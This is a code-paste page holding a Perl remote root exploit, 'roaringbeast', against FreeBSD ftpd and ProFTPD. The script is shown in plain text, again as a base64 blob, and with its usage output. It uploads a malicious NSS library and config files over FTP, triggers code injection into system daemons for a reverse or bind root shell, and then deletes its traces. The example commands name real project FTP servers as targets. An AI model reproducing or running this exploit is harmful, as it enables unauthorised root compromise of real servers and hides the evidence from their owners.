Ideone.com

fork download

copy

#FreeBSD ftpd and ProFTPD Remote Root Exploit
#By Kingcope
#Year 2011
#the "roaringbeast" exploit
 
use Net::FTP;
 
sub usage {
print "FreeBSD ftpd and ProFTPD Remote Root Exploit\nBy Kingcope\nYear 2011\nthe \"roaringbeast\" exploit\n\n";
print "usage: perl roaringbeast.pl <target_version> <username> <password> <your_ip> <your_port> <freebsdftpd/proftpd> <process to inject> <target>\n";
print "<<TARGETS>>\n0 FreeBSD-8.2,8.1,7.2,7.1 i386\n";
print "1 FreeBSD-6.3 i386\n";
print "2 FreeBSD-5.5,5.2 i386\n";
print "3 FreeBSD-8.2 amd64\n";
print "4 FreeBSD-7.3, 7.0 amd64\n";
print "5 FreeBSD-6.4, 6.2 amd64\n";
print "Process to inject shellcode can be:\n";
print "inetd : good candidate for FreeBSD ftpd - dont use for amd64 targets (!)\n";
print "syslogd : good candidate for ProFTPD\n";
print "cron : good candidate for ProFTPD\n";
print "sendmail : candidate for ProFTPD\n";
print "be carefule: the process will crash after exploitation.\n";
print "yourip not needed for amd64 targets, expl will spawn a root shell on port yourport\n\n";
print "examples:\n";
print "perl roaringbeast.pl 1 holy grail 222.222.222.222 443 freebsdftpd inetd ftp.freebsd.org\n";
print "perl roaringbeast.pl 1 holy grail 222.222.222.222 443 proftpd syslogd ftp.proftpd.org\n";
print "amd64: perl roaringbeast.pl 2 holy grail any 31337 proftpd syslogd ftp.proftpd.org\n";
exit;
}
 
if ($#ARGV != 7) {
	usage;
}
 
$ver = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$ip = $ARGV[3];
$port = $ARGV[4];
$tgt = $ARGV[5];
$inject = $ARGV[6];
$target = $ARGV[7];
 
$|=1;
if ($tgt ne "freebsdftpd" and $tgt ne "proftpd") {
	print "Please specify 'freebsdftpd' or 'proftpd' as 6th argumen.\n";
	exit;
}
 
if ($tgt eq "freebsdftpd") {
	$tgt = "f";
}
 
if ($tgt eq "proftpd") {
	$tgt = "p";
}
 
$beast="";
 
$amd64 = false;
 
if ($ver eq "0") {
	$beast = "beast.so.1.0_FreeBSD8";
}
 
if ($ver eq "1") {
	$beast = "beast.so.1.0_FreeBSD6";
}
 
if ($ver eq "2") {
	$beast = "beast.so.1.0_FreeBSD5";
}
 
if ($ver eq "3") {
	$beast = "beast.so.1.0_FreeBSD8,amd64";	
	$amd64 = true;
}
 
if ($ver eq "4") {
	$beast = "beast.so.1.0_FreeBSD7,amd64";	
	$amd64 = true;
}
 
if ($ver eq "5") {
	$beast = "beast.so.1.0_FreeBSD6,amd64";	
	$amd64 = true;
}
 
 
if ($beast eq "") {
	print "Specify a target.\n";
	exit; 
}
 
print "Connecting to target ftp $target ...\n";
$ftp = Net::FTP->new($target, Debug => 0)
      or die "Cannot connect to $target: $@";
 
print "Logging into target ftp $target ...\n";
$ftp->login($user,$pass)
      or die "Cannot login ", $ftp->message;
 
print "Making /etc and /lib directories ...\n";
 
$ftp->rmdir("etc");
$ftp->rmdir("lib");
$ftp->mkdir("etc") or die "Cannot make directory ", $ftp->message;
$ftp->mkdir("lib") or die "Cannot make directory ", $ftp->message;
 
print "Putting nsswitch.conf and beast.so.1.0\n";
$ftp->binary();
$ftp->put($beast, "lib/nss_compat.so.1") or die "Cannot put file into lib/", $ftp->message;
$ftp->put("nsswitch.conf", "etc/nsswitch.conf") or die "Cannot put file into etc/", $ftp->message;
 
print "Putting configuration files\n";
open FILE, ">rbc.conf";
print FILE $ip;
close FILE;
open FILE, ">rbp.conf";
print FILE $port;
close FILE;
open FILE, ">inj.conf";
print FILE $inject;
close FILE;
open FILE, ">tgt.conf";
print FILE $tgt;
close FILE;
 
$ftp->put("rbc.conf", "etc/rbc.conf") or die "Cannot put conf file into etc/", $ftp->message;
$ftp->put("rbp.conf", "etc/rbp.conf") or die "Cannot put conf file into etc/", $ftp->message;
$ftp->put("inj.conf", "etc/trace.conf") or die "Cannot put conf file into etc/", $ftp->message;
$ftp->put("tgt.conf", "etc/tgt.conf") or die "Cannot put conf file into etc/", $ftp->message;
 
unlink "rbc.conf";
unlink "rbp.conf";
unlink "inj.conf";
unlink "tgt.conf";
 
print "TRIGGERING !!!\n";
$ftp->quot("SITE CHMOD 777 nonexistant");
$ftp->quot("STAT .");
 
$ftp->quot("QUIT");
 
sleep 2;
 
$ftp = Net::FTP->new($target, Debug => 0)
      or exit;
 
print "Logging into target ftp $target ...\n";
$ftp->login($user,$pass)
      or die "Cannot login to remove files", $ftp->message;
 
print "Removing files\n";
$ftp->delete("etc/rbc.conf");
$ftp->delete("etc/rbp.conf");
$ftp->delete("etc/tgt.conf");
$ftp->delete("etc/inj.conf");
$ftp->delete("etc/trace.conf");
$ftp->delete("etc/nsswitch.conf");
$ftp->rmdir("etc");
$ftp->delete("lib/nss_compat.so.1");
$ftp->rmdir("lib");
 
print "Done.\n";

I0ZyZWVCU0QgZnRwZCBhbmQgUHJvRlRQRCBSZW1vdGUgUm9vdCBFeHBsb2l0CiNCeSBLaW5nY29wZQojWWVhciAyMDExCiN0aGUgInJvYXJpbmdiZWFzdCIgZXhwbG9pdAoKdXNlIE5ldDo6RlRQOwoKc3ViIHVzYWdlIHsKcHJpbnQgIkZyZWVCU0QgZnRwZCBhbmQgUHJvRlRQRCBSZW1vdGUgUm9vdCBFeHBsb2l0XG5CeSBLaW5nY29wZVxuWWVhciAyMDExXG50aGUgXCJyb2FyaW5nYmVhc3RcIiBleHBsb2l0XG5cbiI7CnByaW50ICJ1c2FnZTogcGVybCByb2FyaW5nYmVhc3QucGwgPHRhcmdldF92ZXJzaW9uPiA8dXNlcm5hbWU+IDxwYXNzd29yZD4gPHlvdXJfaXA+IDx5b3VyX3BvcnQ+IDxmcmVlYnNkZnRwZC9wcm9mdHBkPiA8cHJvY2VzcyB0byBpbmplY3Q+IDx0YXJnZXQ+XG4iOwpwcmludCAiPDxUQVJHRVRTPj5cbjAgRnJlZUJTRC04LjIsOC4xLDcuMiw3LjEgaTM4NlxuIjsKcHJpbnQgIjEgRnJlZUJTRC02LjMgaTM4NlxuIjsKcHJpbnQgIjIgRnJlZUJTRC01LjUsNS4yIGkzODZcbiI7CnByaW50ICIzIEZyZWVCU0QtOC4yIGFtZDY0XG4iOwpwcmludCAiNCBGcmVlQlNELTcuMywgNy4wIGFtZDY0XG4iOwpwcmludCAiNSBGcmVlQlNELTYuNCwgNi4yIGFtZDY0XG4iOwpwcmludCAiUHJvY2VzcyB0byBpbmplY3Qgc2hlbGxjb2RlIGNhbiBiZTpcbiI7CnByaW50ICJpbmV0ZCA6IGdvb2QgY2FuZGlkYXRlIGZvciBGcmVlQlNEIGZ0cGQgLSBkb250IHVzZSBmb3IgYW1kNjQgdGFyZ2V0cyAoISlcbiI7CnByaW50ICJzeXNsb2dkIDogZ29vZCBjYW5kaWRhdGUgZm9yIFByb0ZUUERcbiI7CnByaW50ICJjcm9uIDogZ29vZCBjYW5kaWRhdGUgZm9yIFByb0ZUUERcbiI7CnByaW50ICJzZW5kbWFpbCA6IGNhbmRpZGF0ZSBmb3IgUHJvRlRQRFxuIjsKcHJpbnQgImJlIGNhcmVmdWxlOiB0aGUgcHJvY2VzcyB3aWxsIGNyYXNoIGFmdGVyIGV4cGxvaXRhdGlvbi5cbiI7CnByaW50ICJ5b3VyaXAgbm90IG5lZWRlZCBmb3IgYW1kNjQgdGFyZ2V0cywgZXhwbCB3aWxsIHNwYXduIGEgcm9vdCBzaGVsbCBvbiBwb3J0IHlvdXJwb3J0XG5cbiI7CnByaW50ICJleGFtcGxlczpcbiI7CnByaW50ICJwZXJsIHJvYXJpbmdiZWFzdC5wbCAxIGhvbHkgZ3JhaWwgMjIyLjIyMi4yMjIuMjIyIDQ0MyBmcmVlYnNkZnRwZCBpbmV0ZCBmdHAuZnJlZWJzZC5vcmdcbiI7CnByaW50ICJwZXJsIHJvYXJpbmdiZWFzdC5wbCAxIGhvbHkgZ3JhaWwgMjIyLjIyMi4yMjIuMjIyIDQ0MyBwcm9mdHBkIHN5c2xvZ2QgZnRwLnByb2Z0cGQub3JnXG4iOwpwcmludCAiYW1kNjQ6IHBlcmwgcm9hcmluZ2JlYXN0LnBsIDIgaG9seSBncmFpbCBhbnkgMzEzMzcgcHJvZnRwZCBzeXNsb2dkIGZ0cC5wcm9mdHBkLm9yZ1xuIjsKZXhpdDsKfQoKaWYgKCQjQVJHViAhPSA3KSB7Cgl1c2FnZTsKfQoKJHZlciA9ICRBUkdWWzBdOwokdXNlciA9ICRBUkdWWzFdOwokcGFzcyA9ICRBUkdWWzJdOwokaXAgPSAkQVJHVlszXTsKJHBvcnQgPSAkQVJHVls0XTsKJHRndCA9ICRBUkdWWzVdOwokaW5qZWN0ID0gJEFSR1ZbNl07CiR0YXJnZXQgPSAkQVJHVls3XTsKCiR8PTE7CmlmICgkdGd0IG5lICJmcmVlYnNkZnRwZCIgYW5kICR0Z3QgbmUgInByb2Z0cGQiKSB7CglwcmludCAiUGxlYXNlIHNwZWNpZnkgJ2ZyZWVic2RmdHBkJyBvciAncHJvZnRwZCcgYXMgNnRoIGFyZ3VtZW4uXG4iOwoJZXhpdDsKfQoKaWYgKCR0Z3QgZXEgImZyZWVic2RmdHBkIikgewoJJHRndCA9ICJmIjsKfQoKaWYgKCR0Z3QgZXEgInByb2Z0cGQiKSB7CgkkdGd0ID0gInAiOwp9CgokYmVhc3Q9IiI7CgokYW1kNjQgPSBmYWxzZTsKCmlmICgkdmVyIGVxICIwIikgewoJJGJlYXN0ID0gImJlYXN0LnNvLjEuMF9GcmVlQlNEOCI7Cn0KCmlmICgkdmVyIGVxICIxIikgewoJJGJlYXN0ID0gImJlYXN0LnNvLjEuMF9GcmVlQlNENiI7Cn0KCmlmICgkdmVyIGVxICIyIikgewoJJGJlYXN0ID0gImJlYXN0LnNvLjEuMF9GcmVlQlNENSI7Cn0KCmlmICgkdmVyIGVxICIzIikgewoJJGJlYXN0ID0gImJlYXN0LnNvLjEuMF9GcmVlQlNEOCxhbWQ2NCI7CQoJJGFtZDY0ID0gdHJ1ZTsKfQoKaWYgKCR2ZXIgZXEgIjQiKSB7CgkkYmVhc3QgPSAiYmVhc3Quc28uMS4wX0ZyZWVCU0Q3LGFtZDY0IjsJCgkkYW1kNjQgPSB0cnVlOwp9CgppZiAoJHZlciBlcSAiNSIpIHsKCSRiZWFzdCA9ICJiZWFzdC5zby4xLjBfRnJlZUJTRDYsYW1kNjQiOwkKCSRhbWQ2NCA9IHRydWU7Cn0KCgppZiAoJGJlYXN0IGVxICIiKSB7CglwcmludCAiU3BlY2lmeSBhIHRhcmdldC5cbiI7CglleGl0OyAKfQoKcHJpbnQgIkNvbm5lY3RpbmcgdG8gdGFyZ2V0IGZ0cCAkdGFyZ2V0IC4uLlxuIjsKJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJHRhcmdldCwgRGVidWcgPT4gMCkKICAgICAgb3IgZGllICJDYW5ub3QgY29ubmVjdCB0byAkdGFyZ2V0OiAkQCI7CgpwcmludCAiTG9nZ2luZyBpbnRvIHRhcmdldCBmdHAgJHRhcmdldCAuLi5cbiI7CiRmdHAtPmxvZ2luKCR1c2VyLCRwYXNzKQogICAgICBvciBkaWUgIkNhbm5vdCBsb2dpbiAiLCAkZnRwLT5tZXNzYWdlOwoKcHJpbnQgIk1ha2luZyAvZXRjIGFuZCAvbGliIGRpcmVjdG9yaWVzIC4uLlxuIjsKCiRmdHAtPnJtZGlyKCJldGMiKTsKJGZ0cC0+cm1kaXIoImxpYiIpOwokZnRwLT5ta2RpcigiZXRjIikgb3IgZGllICJDYW5ub3QgbWFrZSBkaXJlY3RvcnkgIiwgJGZ0cC0+bWVzc2FnZTsKJGZ0cC0+bWtkaXIoImxpYiIpIG9yIGRpZSAiQ2Fubm90IG1ha2UgZGlyZWN0b3J5ICIsICRmdHAtPm1lc3NhZ2U7CgpwcmludCAiUHV0dGluZyBuc3N3aXRjaC5jb25mIGFuZCBiZWFzdC5zby4xLjBcbiI7CiRmdHAtPmJpbmFyeSgpOwokZnRwLT5wdXQoJGJlYXN0LCAibGliL25zc19jb21wYXQuc28uMSIpIG9yIGRpZSAiQ2Fubm90IHB1dCBmaWxlIGludG8gbGliLyIsICRmdHAtPm1lc3NhZ2U7CiRmdHAtPnB1dCgibnNzd2l0Y2guY29uZiIsICJldGMvbnNzd2l0Y2guY29uZiIpIG9yIGRpZSAiQ2Fubm90IHB1dCBmaWxlIGludG8gZXRjLyIsICRmdHAtPm1lc3NhZ2U7CgpwcmludCAiUHV0dGluZyBjb25maWd1cmF0aW9uIGZpbGVzXG4iOwpvcGVuIEZJTEUsICI+cmJjLmNvbmYiOwpwcmludCBGSUxFICRpcDsKY2xvc2UgRklMRTsKb3BlbiBGSUxFLCAiPnJicC5jb25mIjsKcHJpbnQgRklMRSAkcG9ydDsKY2xvc2UgRklMRTsKb3BlbiBGSUxFLCAiPmluai5jb25mIjsKcHJpbnQgRklMRSAkaW5qZWN0OwpjbG9zZSBGSUxFOwpvcGVuIEZJTEUsICI+dGd0LmNvbmYiOwpwcmludCBGSUxFICR0Z3Q7CmNsb3NlIEZJTEU7CgokZnRwLT5wdXQoInJiYy5jb25mIiwgImV0Yy9yYmMuY29uZiIpIG9yIGRpZSAiQ2Fubm90IHB1dCBjb25mIGZpbGUgaW50byBldGMvIiwgJGZ0cC0+bWVzc2FnZTsKJGZ0cC0+cHV0KCJyYnAuY29uZiIsICJldGMvcmJwLmNvbmYiKSBvciBkaWUgIkNhbm5vdCBwdXQgY29uZiBmaWxlIGludG8gZXRjLyIsICRmdHAtPm1lc3NhZ2U7CiRmdHAtPnB1dCgiaW5qLmNvbmYiLCAiZXRjL3RyYWNlLmNvbmYiKSBvciBkaWUgIkNhbm5vdCBwdXQgY29uZiBmaWxlIGludG8gZXRjLyIsICRmdHAtPm1lc3NhZ2U7CiRmdHAtPnB1dCgidGd0LmNvbmYiLCAiZXRjL3RndC5jb25mIikgb3IgZGllICJDYW5ub3QgcHV0IGNvbmYgZmlsZSBpbnRvIGV0Yy8iLCAkZnRwLT5tZXNzYWdlOwoKdW5saW5rICJyYmMuY29uZiI7CnVubGluayAicmJwLmNvbmYiOwp1bmxpbmsgImluai5jb25mIjsKdW5saW5rICJ0Z3QuY29uZiI7CgpwcmludCAiVFJJR0dFUklORyAhISFcbiI7CiRmdHAtPnF1b3QoIlNJVEUgQ0hNT0QgNzc3IG5vbmV4aXN0YW50Iik7CiRmdHAtPnF1b3QoIlNUQVQgLiIpOwoKJGZ0cC0+cXVvdCgiUVVJVCIpOwoKc2xlZXAgMjsKCiRmdHAgPSBOZXQ6OkZUUC0+bmV3KCR0YXJnZXQsIERlYnVnID0+IDApCiAgICAgIG9yIGV4aXQ7CgpwcmludCAiTG9nZ2luZyBpbnRvIHRhcmdldCBmdHAgJHRhcmdldCAuLi5cbiI7CiRmdHAtPmxvZ2luKCR1c2VyLCRwYXNzKQogICAgICBvciBkaWUgIkNhbm5vdCBsb2dpbiB0byByZW1vdmUgZmlsZXMiLCAkZnRwLT5tZXNzYWdlOwoKcHJpbnQgIlJlbW92aW5nIGZpbGVzXG4iOwokZnRwLT5kZWxldGUoImV0Yy9yYmMuY29uZiIpOwokZnRwLT5kZWxldGUoImV0Yy9yYnAuY29uZiIpOwokZnRwLT5kZWxldGUoImV0Yy90Z3QuY29uZiIpOwokZnRwLT5kZWxldGUoImV0Yy9pbmouY29uZiIpOwokZnRwLT5kZWxldGUoImV0Yy90cmFjZS5jb25mIik7CiRmdHAtPmRlbGV0ZSgiZXRjL25zc3dpdGNoLmNvbmYiKTsKJGZ0cC0+cm1kaXIoImV0YyIpOwokZnRwLT5kZWxldGUoImxpYi9uc3NfY29tcGF0LnNvLjEiKTsKJGZ0cC0+cm1kaXIoImxpYiIpOwoKcHJpbnQgIkRvbmUuXG4iOwo=

Success #stdin #stdout 0.27s 18056KB

stdin

copy

Standard input is empty

stdout

copy

FreeBSD ftpd and ProFTPD Remote Root Exploit
By Kingcope
Year 2011
the "roaringbeast" exploit

usage: perl roaringbeast.pl <target_version> <username> <password> <your_ip> <your_port> <freebsdftpd/proftpd> <process to inject> <target>
<<TARGETS>>
0 FreeBSD-8.2,8.1,7.2,7.1 i386
1 FreeBSD-6.3 i386
2 FreeBSD-5.5,5.2 i386
3 FreeBSD-8.2 amd64
4 FreeBSD-7.3, 7.0 amd64
5 FreeBSD-6.4, 6.2 amd64
Process to inject shellcode can be:
inetd : good candidate for FreeBSD ftpd - dont use for amd64 targets (!)
syslogd : good candidate for ProFTPD
cron : good candidate for ProFTPD
sendmail : candidate for ProFTPD
be carefule: the process will crash after exploitation.
yourip not needed for amd64 targets, expl will spawn a root shell on port yourport

examples:
perl roaringbeast.pl 1 holy grail 222.222.222.222 443 freebsdftpd inetd ftp.freebsd.org
perl roaringbeast.pl 1 holy grail 222.222.222.222 443 proftpd syslogd ftp.proftpd.org
amd64: perl roaringbeast.pl 2 holy grail any 31337 proftpd syslogd ftp.proftpd.org

https://ideone.com/fd2NKt

language:

Perl (perl 5.28.1)

created:

visibility:

public

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!

Discover > Sphere Engine API

Discover > IDE Widget

Choose your language